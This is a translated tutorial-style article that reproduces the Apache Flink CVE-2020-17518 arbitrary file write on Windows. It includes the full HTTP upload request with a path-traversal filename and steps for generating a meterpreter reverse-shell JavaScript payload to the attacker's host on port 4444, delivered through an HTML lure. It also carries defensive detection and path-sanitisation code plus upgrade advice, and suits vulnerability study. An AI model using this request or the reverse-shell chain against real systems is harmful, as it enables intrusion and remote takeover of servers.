2025-01-18 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)05/31 Report--
This article describes how to reproduce the Apache Flink directory traversal vulnerability CVE-2020-17518 in a Windows environment. The content is quite detailed; interested readers can refer to it, and I hope it is helpful to you.
Recurrence of Apache Flink directory traversal vulnerabilities (CVE-2020-17518)
1. Vulnerability reproduction
1.1 Vulnerability background
Apache Flink is an open source stream processing framework developed by the Apache Software Foundation. Its core is a distributed streaming dataflow engine written in Java and Scala. Flink executes arbitrary dataflow programs in a data-parallel and pipelined manner, and its pipelined runtime can execute both batch and streaming programs. Recently the Apache website published an advisory for the Apache Flink directory traversal vulnerability (CVE-2020-17518): a remote attacker can traverse directories through the REST API and thereby read and write files.
1.2 Vulnerability description
CVE-2020-17518: file write vulnerability
Apache Flink 1.5.1 introduced a REST API that allows an attacker to write a file anywhere on the local file system through a maliciously modified HTTP header.
1.3 Building the vulnerable environment
Flink installation and deployment: Windows local deployment
Flink can run on Linux, Mac OS X, and Windows. To run Flink, you must first install JDK 8.x. The reproduction environment here is built on Windows.
For JDK installation, please see: http://www.itclj.com/blog/5920236681c06e672f942ad4
Download
Download address on the official website: https://flink.apache.org/zh/downloads.html
Baidu disk: https://pan.baidu.com/s/1kmnXBD_5685cvgmsQ7xEbg extraction code: n9bs
Start
Extract the downloaded Flink archive, go to the bin directory, find start-cluster.bat, and double-click it to run.
Flink listens on port 8081 by default; the web UI can be accessed at http://you-ip:8081
1.3 Reproducing the vulnerability
Attack machine used this time: Kali, IP 192.168.0.105
Target machine: Windows 10 x64, IP 192.168.0.102
Copy the following payload into the Burp Suite Repeater module and send it. A file named success.txt is created under the /Users/admin/AppData/Local/Temp/flink-web-c208315e-b746-4692-8281-1d566b1b8c09/flink-web-ui/ directory on the C drive of the Windows host where Flink is deployed, and the content written to success.txt is "success".
POST /jars/upload HTTP/1.1
Host: you-ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--7953587633284837342617937085
Content-Length: 7302
Origin: http://you-ip:8081
Connection: close
Referer: http://you-ip:8081/

----7953587633284837342617937085
Content-Disposition: form-data; name="jarfile"; filename="/Users/admin/AppData/Local/Temp/flink-web-c208315e-b746-4692-8281-1d566b1b8c09/flink-web-ui/success.txt"
Content-Type: application/octet-stream

Success
----7953587633284837342617937085--
You can see that the success.txt file was created successfully.
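From the defender's side, the request above is easy to recognise: the filename in the multipart Content-Disposition header is a full path rather than a plain file name. The following script is an added example (not code from the article or from the Flink project) that parses a raw multipart upload request and flags such filenames. The two sample requests embedded in it are constructed for the example, modelled on the /jars/upload request above; the host and boundary values are made up.

```python
"""Inspect a raw multipart/form-data upload request and flag client-supplied
filenames that are paths rather than plain names (the shape of the
CVE-2020-17518 request above)."""
import re

# Constructed sample requests, modelled on the /jars/upload request in this
# article. Host and boundary values are made up for the example.
MALICIOUS_REQUEST = (
    b"POST /jars/upload HTTP/1.1\r\n"
    b"Host: 192.168.0.102:8081\r\n"
    b"Content-Type: multipart/form-data; boundary=--7953587633284837342617937085\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"----7953587633284837342617937085\r\n"
    b'Content-Disposition: form-data; name="jarfile"; '
    b'filename="/Users/admin/AppData/Local/Temp/flink-web-ui/success.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"success\r\n"
    b"----7953587633284837342617937085--\r\n"
)

BENIGN_REQUEST = (
    b"POST /jars/upload HTTP/1.1\r\n"
    b"Host: 192.168.0.102:8081\r\n"
    b"Content-Type: multipart/form-data; boundary=example-boundary\r\n"
    b"\r\n"
    b"--example-boundary\r\n"
    b'Content-Disposition: form-data; name="jarfile"; filename="wordcount.jar"\r\n'
    b"Content-Type: application/java-archive\r\n"
    b"\r\n"
    b"PK...\r\n"
    b"--example-boundary--\r\n"
)


def split_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def multipart_filenames(headers, body):
    """Return every filename= value found in the parts of a multipart body."""
    match = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if not match:
        return []
    delimiter = b"--" + match.group(1).encode("latin-1")
    filenames = []
    for part in body.split(delimiter)[1:]:   # element [0] is the preamble
        if part.startswith(b"--"):           # closing delimiter reached
            break
        part_headers = part.split(b"\r\n\r\n", 1)[0].decode("latin-1")
        found = re.search(r'filename="([^"]*)"', part_headers, re.IGNORECASE)
        if found:
            filenames.append(found.group(1))
    return filenames


def filename_findings(filename):
    """Describe why a client-supplied filename is not a plain file name.

    An empty list means the name carries no directory information at all.
    """
    reasons = []
    if filename.startswith(("/", "\\")):
        reasons.append("absolute path")
    if re.match(r"^[A-Za-z]:", filename):
        reasons.append("drive letter")
    components = re.split(r"[\\/]", filename)
    if ".." in components:
        reasons.append("parent-directory component")
    if len(components) > 1:
        reasons.append("directory separator")
    return reasons


def inspect_request(raw):
    """Return [(filename, reasons), ...] for every suspicious upload filename."""
    _, headers, body = split_request(raw)
    findings = []
    for filename in multipart_filenames(headers, body):
        reasons = filename_findings(filename)
        if reasons:
            findings.append((filename, reasons))
    return findings


if __name__ == "__main__":
    for label, raw in (("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, inspect_request(raw))
```

The same check works on either a captured request body or a reverse proxy's multipart logging, and a legitimate Flink jar upload only ever needs a bare file name, so any directory information in that field is a reliable signal.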
1.4 Reverse shell by writing a JS file
1. First generate the JavaScript reverse-shell script with the ps1encode tool, which can be downloaded with git clone https://github.com/CroweCybersecurity/ps1encode.git.
2. Enter the ps1encode directory and generate the payload with the command ./ps1encode.rb --LHOST 192.168.0.105 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js
3. Copy the generated payload into Burp Suite, change the name of the written file to success.js, and send.
4. You can see that success.js has been created successfully on the Windows host where Flink is deployed.
5. Executing the file on Windows
Executing it directly may be too conspicuous, so, following the referenced article, we wrote a success.html file with the following contents:
It's a surprise.
6. Open success.html, select Run -> Allow blocked content -> Yes, and the reverse shell connects successfully.
7. Obtaining the shell
Listen with msf.
At present the reverse shell can establish a connection, but commands cannot be executed. I don't know why.
2. Scope of impact
CVE-2020-17518:
Apache Flink 1.5.1-1.11.2
3. Severity level
High risk
4. Solution
4.1 Official patch
Apache Flink has officially fixed this vulnerability in a new version; please upgrade to Flink 1.11.3 or 1.12.0. Download link: https://flink.apache.org/downloads.html
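The root cause in the request above is that the server let the client-supplied filename choose the directory. The following is an added example of the class of fix (it is not the Flink project's own patch and does not claim to reproduce it): the vulnerable join beside a hardened resolver that keeps only the last name component and then verifies the result still lies inside the upload directory. The upload directory path is a constructed value for the example.

```python
"""Resolve an upload target from a client-supplied filename without letting
that name choose the directory (illustration of the class of fix, not the
Flink project's own patch)."""
import os

# Constructed upload directory for the example; a real Flink instance uses a
# per-instance flink-web-<uuid>/flink-web-ui temp directory, as seen above.
UPLOAD_DIR = "/srv/flink/upload"


def vulnerable_target(upload_dir, client_filename):
    """Trusts the client-supplied name as a path.

    os.path.join discards upload_dir when the second argument is absolute,
    so an absolute filename in Content-Disposition picks any location.
    """
    return os.path.join(upload_dir, client_filename)


def is_inside(directory, path):
    """True if path resolves to a location inside directory."""
    directory = os.path.realpath(directory)
    path = os.path.realpath(path)
    try:
        return os.path.commonpath([directory, path]) == directory
    except ValueError:  # different drives on Windows
        return False


def hardened_target(upload_dir, client_filename):
    """Keep only the final name component, then verify containment."""
    # Treat both separator styles as separators, whatever the server OS.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if name in ("", ".", "..") or "\x00" in name:
        raise ValueError("invalid upload filename")
    target = os.path.join(upload_dir, name)
    # Defence in depth: the basename step should already guarantee this.
    if not is_inside(upload_dir, target):
        raise ValueError("upload target escaped the upload directory")
    return target


def rejects(upload_dir, client_filename):
    """True if the hardened resolver refuses the name."""
    try:
        hardened_target(upload_dir, client_filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    attacker_name = "/Users/admin/AppData/Local/Temp/flink-web-ui/success.txt"
    print("vulnerable:", vulnerable_target(UPLOAD_DIR, attacker_name))
    print("hardened:  ", hardened_target(UPLOAD_DIR, attacker_name))
```

The containment check is kept even though the basename step already removes every directory component; it costs nothing and catches a later refactor that reintroduces the client path. Upgrading to the fixed Flink release remains the actual remedy.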
This concludes the reproduction of the Apache Flink directory traversal vulnerability CVE-2020-17518 in a Windows environment. I hope the above content is of some help and lets you learn more. If you think the article is good, you can share it for more people to see.
© 2024 shulou.com SLNews company. All rights reserved.